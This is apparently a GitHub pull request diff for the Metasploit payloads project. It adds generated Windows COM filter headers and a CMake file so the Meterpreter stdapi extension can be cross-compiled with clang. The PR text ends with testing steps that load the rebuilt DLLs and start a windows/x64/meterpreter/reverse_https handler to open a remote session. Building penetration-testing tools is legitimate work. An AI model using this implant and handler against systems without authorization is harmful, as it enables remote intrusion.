+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilterFromStream )( 
+            __RPC__in ILoadFilter * This,
+            /* [in] */ __RPC__in_opt IStream *pStm,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *pFilteredSources,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt);
+        
+        END_INTERFACE
+    } ILoadFilterVtbl;
+
+    interface ILoadFilter
+    {
+        CONST_VTBL struct ILoadFilterVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ILoadFilter_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ILoadFilter_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ILoadFilter_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ILoadFilter_LoadIFilter(This,pwcsPath,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt)	\
+    ( (This)->lpVtbl -> LoadIFilter(This,pwcsPath,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt) ) 
+
+#define ILoadFilter_LoadIFilterFromStorage(This,pStg,pUnkOuter,pwcsOverride,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt)	\
+    ( (This)->lpVtbl -> LoadIFilterFromStorage(This,pStg,pUnkOuter,pwcsOverride,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt) ) 
+
+#define ILoadFilter_LoadIFilterFromStream(This,pStm,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt)	\
+    ( (This)->lpVtbl -> LoadIFilterFromStream(This,pStm,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ILoadFilter_INTERFACE_DEFINED__ */
+
+
+#ifndef __ILoadFilterWithPrivateComActivation_INTERFACE_DEFINED__
+#define __ILoadFilterWithPrivateComActivation_INTERFACE_DEFINED__
+
+/* interface ILoadFilterWithPrivateComActivation */
+/* [unique][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ILoadFilterWithPrivateComActivation;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("40BDBD34-780B-48D3-9BB6-12EBD4AD2E75")
+    ILoadFilterWithPrivateComActivation : public ILoadFilter
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE LoadIFilterWithPrivateComActivation( 
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *filteredSources,
+            /* [in] */ BOOL useDefault,
+            /* [out] */ __RPC__out CLSID *filterClsid,
+            /* [out] */ __RPC__out BOOL *isFilterPrivateComActivated,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **filterObj) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ILoadFilterWithPrivateComActivationVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilter )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pwcsPath,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *pFilteredSources,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilterFromStorage )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This,
+            /* [in] */ __RPC__in_opt IStorage *pStg,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pwcsOverride,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilterFromStream )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This,
+            /* [in] */ __RPC__in_opt IStream *pStm,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *pFilteredSources,
+            /* [unique][in] */ __RPC__in_opt IUnknown *pUnkOuter,
+            /* [in] */ BOOL fUseDefault,
+            /* [unique][out][in] */ __RPC__inout_opt CLSID *pFilterClsid,
+            /* [unique][out][in] */ __RPC__inout_opt int *SearchDecSize,
+            /* [length_is][length_is][size_is][size_is][unique][out][in] */ __RPC__deref_opt_inout_ecount_part_opt(( *SearchDecSize + 1 ) , ( *SearchDecSize + 1 ) ) WCHAR **pwcsSearchDesc,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **ppIFilt);
+        
+        HRESULT ( STDMETHODCALLTYPE *LoadIFilterWithPrivateComActivation )( 
+            __RPC__in ILoadFilterWithPrivateComActivation * This,
+            /* [unique][in] */ __RPC__in_opt FILTERED_DATA_SOURCES *filteredSources,
+            /* [in] */ BOOL useDefault,
+            /* [out] */ __RPC__out CLSID *filterClsid,
+            /* [out] */ __RPC__out BOOL *isFilterPrivateComActivated,
+            /* [unique][out][in] */ __RPC__deref_opt_inout_opt IFilter **filterObj);
+        
+        END_INTERFACE
+    } ILoadFilterWithPrivateComActivationVtbl;
+
+    interface ILoadFilterWithPrivateComActivation
+    {
+        CONST_VTBL struct ILoadFilterWithPrivateComActivationVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ILoadFilterWithPrivateComActivation_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ILoadFilterWithPrivateComActivation_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ILoadFilterWithPrivateComActivation_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ILoadFilterWithPrivateComActivation_LoadIFilter(This,pwcsPath,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt)	\
+    ( (This)->lpVtbl -> LoadIFilter(This,pwcsPath,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt) ) 
+
+#define ILoadFilterWithPrivateComActivation_LoadIFilterFromStorage(This,pStg,pUnkOuter,pwcsOverride,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt)	\
+    ( (This)->lpVtbl -> LoadIFilterFromStorage(This,pStg,pUnkOuter,pwcsOverride,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt) ) 
+
+#define ILoadFilterWithPrivateComActivation_LoadIFilterFromStream(This,pStm,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt)	\
+    ( (This)->lpVtbl -> LoadIFilterFromStream(This,pStm,pFilteredSources,pUnkOuter,fUseDefault,pFilterClsid,SearchDecSize,pwcsSearchDesc,ppIFilt) ) 
+
+
+#define ILoadFilterWithPrivateComActivation_LoadIFilterWithPrivateComActivation(This,filteredSources,useDefault,filterClsid,isFilterPrivateComActivated,filterObj)	\
+    ( (This)->lpVtbl -> LoadIFilterWithPrivateComActivation(This,filteredSources,useDefault,filterClsid,isFilterPrivateComActivated,filterObj) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ILoadFilterWithPrivateComActivation_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_filtereg_0000_0002 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+
+
+extern RPC_IF_HANDLE __MIDL_itf_filtereg_0000_0002_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_filtereg_0000_0002_v0_0_s_ifspec;
+
+/* Additional Prototypes for ALL interfaces */
+
+/* end of Additional Prototypes */
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
+
+

--- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
@@ -1,0 +1,215 @@
+cmake_minimum_required(VERSION 3.0.0 FATAL_ERROR)
+
+################### Variables. ####################
+# Change if you want modify path or other values. #
+###################################################
+
+set(PROJECT_NAME ext_server_stdapi)
+# Output Variables
+set(OUTPUT_DEBUG ../../output/Debug/)
+set(OUTPUT_RELEASE ../../../output/Release/)
+set(CMAKE_LIBRARY_OUTPUT_DIRECTORY ${OUTPUT_RELEASE})
+
+# Folders files
+set(CPP_DIR_1 ../../source/extensions/stdapi/server/audio)
+set(CPP_DIR_2 ../../source/extensions/stdapi/server/fs)
+set(CPP_DIR_3 ../../source/extensions/stdapi/server)
+set(CPP_DIR_4 ../../source/extensions/stdapi/server/net/config)
+set(CPP_DIR_5 ../../source/extensions/stdapi/server/net)
+set(CPP_DIR_6 ../../source/extensions/stdapi/server/net/socket)
+set(CPP_DIR_7 ../../source/extensions/stdapi/server/sys)
+set(CPP_DIR_8 ../../source/extensions/stdapi/server/sys/process)
+set(CPP_DIR_9 ../../source/extensions/stdapi/server/sys/registry)
+set(CPP_DIR_10 ../../source/extensions/stdapi/server/sys/power)
+set(CPP_DIR_11 ../../source/extensions/stdapi/server/sys/eventlog)
+set(CPP_DIR_12 ../../source/extensions/stdapi/server/sys/config)
+set(CPP_DIR_13 ../../source/extensions/stdapi/server/ui)
+set(CPP_DIR_14 ../../source/extensions/stdapi/server/railgun)
+set(CPP_DIR_15 ../../source/extensions/stdapi/server/webcam)
+set(HEADER_DIR_1 ../../source/extensions/stdapi/server)
+set(HEADER_DIR_2 ../../source/extensions/stdapi/server/sys/config)
+set(HEADER_DIR_3 ../../source/extensions/stdapi)
+set(HEADER_DIR_4 ../../source/extensions/stdapi/server/net)
+set(HEADER_DIR_5 ../../source/extensions/stdapi/server/net/socket)
+set(HEADER_DIR_6 ../../source/extensions/stdapi/server/sys)
+set(HEADER_DIR_7 ../../source/extensions/stdapi/server/sys/process)
+set(HEADER_DIR_8 ../../source/extensions/stdapi/server/sys/registry)
+set(HEADER_DIR_9 ../../source/extensions/stdapi/server/sys/power)
+set(HEADER_DIR_10 ../../source/extensions/stdapi/server/sys/eventlog)
+set(HEADER_DIR_11 ../../source/extensions/stdapi/server/ui)
+set(HEADER_DIR_12 ../../source/extensions/stdapi/server/railgun)
+set(HEADER_DIR_13 ../../source/extensions/stdapi/server/webcam)
+set(HEADER_DIR_14 ../../source/extensions/stdapi/server/audio)
+set(HEADER_DIR_15 ../../source/extensions/stdapi/server/fs)
+set(HEADER_DIR_16 ../../source/ReflectiveDLLInjection/common)
+set(HEADER_DIR_17 ../../source/extra_includes)
+set(HEADER_DIR_18 ../../source/jpeg-8)
+
+
+############## CMake Project ################
+#        The main options of project        #
+#############################################
+
+project(${PROJECT_NAME} C)
+
+# Define Release by default.
+if(NOT CMAKE_BUILD_TYPE)
+  set(CMAKE_BUILD_TYPE "Release")
+  message(STATUS "Build type not specified: Use Release by default.")
+endif(NOT CMAKE_BUILD_TYPE)
+
+# Definition of Macros
+add_definitions(
+   -D__GNUC__
+   -DNDEBUG 
+   -D__in=SAL__in
+   -D__inout=SAL__inout
+   -D__out_bcount_part_opt=SAL__out_bcount_part_opt
+   -D__in_ecount=SAL__in_ecount
+   -DHAVE_BOOLEAN
+   -DMTP_EXTENSION
+   #-DUSE_DLL
+
+
+
+)
+
+############## Artefacts Output #################
+# Defines outputs , depending Debug or Release. #
+#################################################
+
+if(CMAKE_BUILD_TYPE STREQUAL "Debug")
+  set(CMAKE_LIBRARY_OUTPUT_DIRECTORY "${OUTPUT_DEBUG}")
+  set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY "${OUTPUT_DEBUG}")
+  set(CMAKE_EXECUTABLE_OUTPUT_DIRECTORY "${OUTPUT_DEBUG}")
+else()
+  set(CMAKE_LIBRARY_OUTPUT_DIRECTORY "${OUTPUT_RELEASE}")
+  set(CMAKE_ARCHIVE_OUTPUT_DIRECTORY "${OUTPUT_RELEASE}")
+  set(CMAKE_EXECUTABLE_OUTPUT_DIRECTORY "${OUTPUT_RELEASE}")
+endif()
+
+################### Dependencies ##################
+# Add Dependencies to project.                    #
+###################################################
+
+option(BUILD_DEPENDS 
+   "Build other CMake project." 
+   OFF 
+)
+
+# Dependencies : disable BUILD_DEPENDS to link with lib already build.
+if(BUILD_DEPENDS)
+   #add_subdirectory(../backcompat ${OUTPUT_RELEASE})
+   add_subdirectory(../../common ${OUTPUT_RELEASE})
+   add_subdirectory(../../ReflectiveDLLInjection ${OUTPUT_RELEASE})
+   add_subdirectory(../../metsrv ${OUTPUT_RELEASE})
+else()
+   #add_subdirectory(../metsrv ${OUTPUT_RELEASE})
+   link_directories(${OUTPUT_RELEASE})
+   link_directories(../../output/Release)
+endif()
+
+################# Flags ################
+# Defines Flags for Windows and Linux. #
+########################################
+SET(CMAKE_SYSTEM_NAME Windows)
+include(CMakeForceCompiler)
+IF("${GNU_HOST}" STREQUAL "")
+    SET(GNU_HOST x86_64-w64-mingw32)
+ENDIF()
+# Prefix detection only works with compiler id "GNU"
+#CMAKE_FORCE_C_COMPILER(${GNU_HOST}-gcc GNU)
+# CMake doesn't automatically look for prefixed 'windres', do it manually:
+SET(CMAKE_RC_COMPILER ${GNU_HOST}-windres)
+set( _MSC_VER 1910 )
+SET(CMAKE_C_COMPILER clang)
+
+if(MSVC)
+   set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /W3 /EHsc")
+   set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /W3 /EHsc")
+endif(MSVC)
+if(NOT MSVC)
+set(CMAKE_LIBRARY_ARCHITECTURE x64 CACHE STRING "" FORCE)
+set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -target x86_64-w64-windows-gnu -I/usr/x86_64-w64-mingw32/include/ -delayload -undefined dynamic_lookup  -Wvisibility -Wfatal-errors -fmsc-version=${_MSC_VER} -fms-extensions -fms-compatibility -fdelayed-template-parsing ")
+SET(CMAKE_EXE_LINKER_FLAGS  "${CMAKE_EXE_LINKER_FLAGS} -delayload -undefined dynamic_lookup")
+set (CMAKE_SHARED_LINKER_FLAGS "-Wl,--as-needed -delayload -undefined dynamic_lookup")
+
+   set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11 -Wvisibility")
+   if ("${CMAKE_CXX_COMPILER_ID}" STREQUAL "Clang")
+       set (CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -stdlib=libc++")
+   endif()
+endif(NOT MSVC)
+
+################ Files ################
+#   --   Add files to project.   --   #
+#######################################
+
+file(GLOB SRC_FILES
+    ${CPP_DIR_1}/*.c
+    ${CPP_DIR_1}/*.cpp
+    ${CPP_DIR_2}/*.c
+    ${CPP_DIR_2}/*.cpp
+    ${CPP_DIR_3}/*.c
+    ${CPP_DIR_3}/*.cpp
+    ${CPP_DIR_4}/*.c
+    ${CPP_DIR_4}/*.cpp
+    ${CPP_DIR_5}/*.c
+    ${CPP_DIR_5}/*.cpp
+    ${CPP_DIR_6}/*.c
+    ${CPP_DIR_6}/*.cpp
+    ${CPP_DIR_7}/*.c
+    ${CPP_DIR_7}/*.cpp
+    ${CPP_DIR_8}/*.c
+    ${CPP_DIR_8}/*.cpp
+    ${CPP_DIR_9}/*.c
+    ${CPP_DIR_9}/*.cpp
+    ${CPP_DIR_10}/*.c
+    ${CPP_DIR_10}/*.cpp
+    ${CPP_DIR_11}/*.c
+    ${CPP_DIR_11}/*.cpp
+    ${CPP_DIR_12}/*.c
+    ${CPP_DIR_12}/*.cpp
+    ${CPP_DIR_13}/*.c
+    ${CPP_DIR_13}/*.cpp
+    ${CPP_DIR_14}/*.c
+    ${CPP_DIR_14}/*.cpp
+    ${CPP_DIR_15}/*.c
+    ${CPP_DIR_15}/*.cpp
+)
+
+include_directories( ${HEADER_DIR_1} )
+include_directories( ${HEADER_DIR_2} )
+include_directories( ${HEADER_DIR_3} )
+include_directories( ${HEADER_DIR_4} )
+include_directories( ${HEADER_DIR_5} )
+include_directories( ${HEADER_DIR_6} )
+include_directories( ${HEADER_DIR_7} )
+include_directories( ${HEADER_DIR_8} )
+include_directories( ${HEADER_DIR_9} )
+include_directories( ${HEADER_DIR_10} )
+include_directories( ${HEADER_DIR_11} )
+include_directories( ${HEADER_DIR_12} )
+include_directories( ${HEADER_DIR_13} )
+include_directories( ${HEADER_DIR_14} )
+include_directories( ${HEADER_DIR_15} )
+include_directories( ${HEADER_DIR_16} ) #ReflectiveDLLInjection
+include_directories( ${HEADER_DIR_17} )
+include_directories( ${HEADER_DIR_18} )
+
+set( CMAKE_C_COMPILE_OPTIONS_PIC "" ) 
+
+add_link_options(-Wl,--unresolved-symbols=ignore-in-shared-libs )# Add library to build.
+
+add_library(${PROJECT_NAME} SHARED
+   ${SRC_FILES}
+)
+
+set(CMAKE_VERBOSE_MAKEFILE ON)
+
+link_directories(/usr/x86_64-w64-mingw32/lib/)
+# Link with other dependencies.
+#target_link_libraries(${PROJECT_NAME} backcompat common metsrv ReflectiveDLLInjection )
+target_link_libraries(${PROJECT_NAME} common ReflectiveDLLInjection psapi winmm iphlpapi shlwapi ws2_32 odbc32 odbccp32 mpr crypt32 wininet winhttp ole32 netapi32 jpeg )
+if(MSVC)
+   target_link_libraries(${PROJECT_NAME} psapi.lib winmm.lib backcompat.lib iphlpapi.lib shlwapi.lib ws2_32.lib odbc32.lib odbccp32.lib metsrv.lib jpeg.lib )
+endif(MSVC)

--- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
@@ -4,7 +4,7 @@ cmake_minimum_required(VERSION 3.0.0 FATAL_ERROR)
 # Change if you want modify path or other values. #
 ###################################################
 
-set(PROJECT_NAME ext_server_stdapi)
+set(PROJECT_NAME ext_server_stdapi.x64)
 # Output Variables
 set(OUTPUT_DEBUG ../../output/Debug/)
 set(OUTPUT_RELEASE ../../../output/Release/)
@@ -206,6 +206,9 @@ add_library(${PROJECT_NAME} SHARED
 )
 
 set(CMAKE_VERBOSE_MAKEFILE ON)
+
+set(CMAKE_SHARED_LIBRARY_PREFIX "")
+set(CMAKE_SHARED_LIBRARY_SUFFIX ".dll")
 
 link_directories(/usr/x86_64-w64-mingw32/lib/)
 # Link with other dependencies.

--- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
+++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt
@@ -68,6 +68,7 @@ add_definitions(
    -D__in_ecount=SAL__in_ecount
    -DHAVE_BOOLEAN
    -DMTP_EXTENSION
+   -DREFLECTIVEDLLINJECTION_NO_INIT
    #-DUSE_DLL
 
 


### PR DESCRIPTION
# Description

PR #320 is too big to be reviewed, so I'm splitting it into smaller ones. This PR contains every change related to "_metsrv_" (_workspace/metsrv_).

In essence, a CMake makefile is added and allow cross-compilation with clang (tested on ubuntu 18.04 and Archlinux).

# Important

This PR depends on:

- https://github.com/rapid7/ReflectiveDLLInjection/pull/7
- https://github.com/rapid7/metasploit-payloads/pull/340
- https://github.com/rapid7/metasploit-payloads/pull/341

Instructions to take care of these dependencies are included in the part "Build instructions".

# build dependencies

## Archlinux (preferred)

clang
aur/mingw-w64-winpthreads-bin
aur/mingw-w64-headers-bin
aur/mingw-w64-libjpeg

## Ubuntu 18.04 
```
# apt-get remove mingw*
wget https://launchpad.net/ubuntu/+archive/primary/+files/mingw-w64-common_6.0.0-3_all.deb
wget https://launchpad.net/ubuntu/+archive/primary/+files/mingw-w64-x86-64-dev_6.0.0-3_all.deb
dpkg -i mingw-w64-common_6.0.0-3_all.deb
dpkg -i mingw-w64-x86-64-dev_6.0.0-3_all.deb
```
You also need libjpeg.a somewhere on your system, but there is no package for that in the official repositories. You will need to build it yourself :

```
wget http://www.ijg.org/files/jpegsrc.9c.tar.gz
tar xf jpegsrc.9c.tar.gz
cd jpeg-9c
mkdir -p build-x86_64-w64-mingw32 && pushd build-x86_64-w64-mingw32
x86_64-w64-mingw32-configure
make
sudo make install
popd
```

# Build instructions

```
git clone https://github.com/plowsec/metasploit-payloads -b clang-compat-stdapi
cd metasploit-payloads
git submodule update --init --recursive
git merge origin/clang-compat-common
git merge origin/clang-compat-metsrv
cd c/meterpreter/source/ReflectiveDLLInjection
git fetch origin pull/7/head:pr/7 && git checkout pr/7
```
This takes care of the following:

* Cloning my fork of _metasploit-payloads_ and checking out the branch _clang-compat-metsrv_ 
* Update the submodules _ReflectiveDLLInjection_ and _mimikatz_
* Merge the PR #340 (which is the "common" subproject).
* Merge the PR #341 (which is the "metsrv" subproject).
* Merge the PR https://github.com/rapid7/ReflectiveDLLInjection/pull/7

## build ReflectiveDLLInjection

```
cd ../../workspace/ReflectiveDLLInjection
mkdir CMakeBuild && cd CMakeBuild
cmake .. && make VERBOSE=1 -j 4
```

## build common

```
cd ../../common
mkdir CMakeBuild && cd CMakeBuild
cmake .. && make VERBOSE=1 -j 4
```
## build metsrv

```
cd ../../metsrv
mkdir CMakeBuild && cd CMakeBuild
cmake .. && make VERBOSE=1 -j 4
```
## build stdapi

```
cd ../../ext_server_stdapi
mkdir CMakeBuild && cd CMakeBuild
cmake .. && make VERBOSE=1 -j 4
```

# Testing

Copy _metsrv.x64.dll_ (located in `metasploit-payloads/c/meterpreter/output/Release`) in your metasploit installation folder.

Do the same for ext_server_stdapi.x64.dll.

In my setup it's in `/opt/metasploit/vendor/bundle/ruby/2.6.0/gems/metasploit-payloads-1.3.66/data/meterpreter/`).

**You may want to backup the original DLLs ;)**

If _msfconsole_ is already launched, type "reload_all", otherwise launch it, setup a handler and spawn a _meterpreter_ session on a 64-bit Windows, with a 64-bit _staged_ payload:

```
handler -H your_local_ip -P 8443 -p windows/x64/meterpreter/reverse_https
```



